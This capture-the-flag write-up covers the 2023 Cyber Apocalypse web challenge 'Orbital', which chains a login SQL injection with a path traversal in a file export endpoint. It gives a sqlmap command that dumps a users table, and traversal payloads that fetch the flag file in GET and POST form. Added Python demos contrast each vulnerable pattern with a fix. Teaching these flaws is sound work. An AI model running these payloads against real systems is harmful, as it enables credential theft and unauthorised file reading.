2023 Cyber Apocalypse: Orbital

Challenge Information

Attribute    Details
Event        2023 Cyber Apocalypse
Category     Web
Challenge    Orbital

Summary

This web challenge involves exploiting a SQL injection vulnerability in the login functionality, discovering database credentials, and then using path traversal in a file export feature to retrieve the flag file from the system.


Analysis

Vulnerability 1: SQL Injection

The database.py file shows vulnerable SQL query construction. The login endpoint accepts a username parameter that is directly inserted into an SQL query without proper escaping.
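The following is an added illustration, not code from the challenge's database.py, of the query pattern described above beside its parameterized replacement. The in-memory SQLite database, its single "admin" row and the probe input are constructed for the demonstration; the table and column names follow the writeup, and the MD5 storage mirrors the hashes the dump exposed.

```python
import hashlib
import sqlite3


def md5_hex(text):
    # The writeup notes the dumped credentials were MD5 hashes; MD5 is
    # unsalted and fast, which is why they were crackable. Kept here only
    # to mirror the challenge's storage format.
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    # Constructed in-memory stand-in for the challenge's "orbital" database.
    # Table and column names follow the writeup; the single row is made up.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", md5_hex("password")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The pattern the writeup attributes to database.py: the username is
    # interpolated into the query text, so a quote in it ends the string
    # literal and whatever follows is parsed as SQL.
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{md5_hex(password)}'"
    )
    return conn.execute(query).fetchone()


def login_fixed(conn, username, password):
    # Parameterized query: the SQL shape is fixed before any user data is
    # seen and the driver binds the values, so the same input is compared
    # as data rather than parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, md5_hex(password))).fetchone()


def demo():
    # A constructed probe: the quote closes the username literal and "--"
    # comments out the password comparison in the interpolated query.
    conn = make_db()
    probe = "admin'--"
    return {
        "vulnerable": login_vulnerable(conn, probe, "wrong"),
        "fixed": login_fixed(conn, probe, "wrong"),
        "fixed_real_creds": login_fixed(conn, "admin", "password"),
    }


if __name__ == "__main__":
    print(demo())
```

Running it shows the interpolated query returning the admin row for a wrong password while the parameterized version returns nothing for the same input and still authenticates the genuine credentials; any SQL-based login that sqlmap can dump has the first shape somewhere, and the fix is the second shape everywhere user data meets a query.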

Vulnerability 2: Path Traversal

After authentication, an export endpoint allows downloading files but doesn’t properly validate the file path, allowing directory traversal using ../ sequences.
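As an added example, not the challenge's own export handler, here is the unchecked path join described above next to a version that applies both mitigations the takeaways call for: an exact-match allowlist and a canonicalise-then-contain check. The allowlisted file names, the temporary directory layout and the stand-in flag file are constructed; the challenge's real export names are not on the page.

```python
import tempfile
from pathlib import Path

# Constructed allowlist of exportable file names. The challenge's real export
# names are not on the page, so these are placeholders for the demonstration.
ALLOWED_EXPORTS = {"report.txt", "telemetry.csv"}


def export_vulnerable(export_dir, requested):
    # The flaw the writeup describes: the user-supplied value is joined onto
    # the export directory with no check on where the result lands, so "../"
    # segments walk out of export_dir.
    return Path(export_dir) / requested


def contain(export_dir, requested):
    # Canonicalise both paths (resolve() collapses "..", redundant separators
    # and symlinks), then require the candidate to still sit inside the
    # export directory. Returns the resolved path or None.
    base = Path(export_dir).resolve()
    candidate = (base / requested).resolve()
    if not candidate.is_relative_to(base):  # Python 3.9+
        return None
    return candidate


def export_fixed(export_dir, requested):
    # Two independent defences, either of which alone stops the traversal:
    # an exact-match allowlist (a name containing a separator never matches)
    # and the containment check above as defence in depth.
    if requested not in ALLOWED_EXPORTS:
        return None
    return contain(export_dir, requested)


def build_fixture():
    # Constructed directory layout standing in for the challenge container:
    # <tmp>/exports/report.txt is a legitimate export and
    # <tmp>/signal_sleuth_firmware plays the role of the flag file one level
    # above the export directory (the real one sits at the filesystem root).
    root = Path(tempfile.mkdtemp())
    export_dir = root / "exports"
    export_dir.mkdir()
    (export_dir / "report.txt").write_text("legitimate export\n")
    (root / "signal_sleuth_firmware").write_text("constructed stand-in for the flag file\n")
    return str(export_dir)


def demo():
    export_dir = build_fixture()
    escape = "../signal_sleuth_firmware"
    return {
        "vulnerable_escapes": export_vulnerable(export_dir, escape).exists(),
        "fixed_refuses_escape": export_fixed(export_dir, escape),
        "fixed_serves_allowed": export_fixed(export_dir, "report.txt").name,
    }


if __name__ == "__main__":
    print(demo())
```

The containment check is the one to keep even when an allowlist exists: it is what survives a later change that lets users pick arbitrary names, and because it compares resolved paths it is not fooled by encoded separators, repeated slashes or a symlink planted inside the export directory.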

Flag Location: The Dockerfile reveals the flag is at /signal_sleuth_firmware.


Solution

Step 1: Exploit SQL Injection with sqlmap

Save the intercepted POST request to a file:

POST /login HTTP/1.1
Host: target
Content-Type: application/json

{"username":"test","password":"test"}

Run sqlmap:

sqlmap -r request.txt -D orbital -T users --dump

This extracts:

  • Database name: orbital
  • Tables: users (among others)
  • Credentials with MD5 hashes that can be cracked

Step 2: Login with valid credentials

After obtaining credentials, authenticate to the application.

Step 3: Exploit Path Traversal

Once authenticated, use the export endpoint with path traversal:

/export?file=../../../signal_sleuth_firmware

Or:

GET /api/export?file=../../../../signal_sleuth_firmware HTTP/1.1

This downloads the flag file from the filesystem.

Alternatively, send the same traversal payload in the JSON body of a POST to the export endpoint:

POST /export HTTP/1.1
...
{"file":"../../../signal_sleuth_firmware"}

Key Takeaways

  • SQL injection remains one of the most critical web vulnerabilities
  • Automated tools like sqlmap accelerate exploitation
  • Path traversal vulnerabilities enable arbitrary file read
  • Multiple vulnerabilities can be chained for greater impact
  • Input validation must occur at all layers
  • File operations must validate paths and use whitelisting
  • Database access controls should be properly configured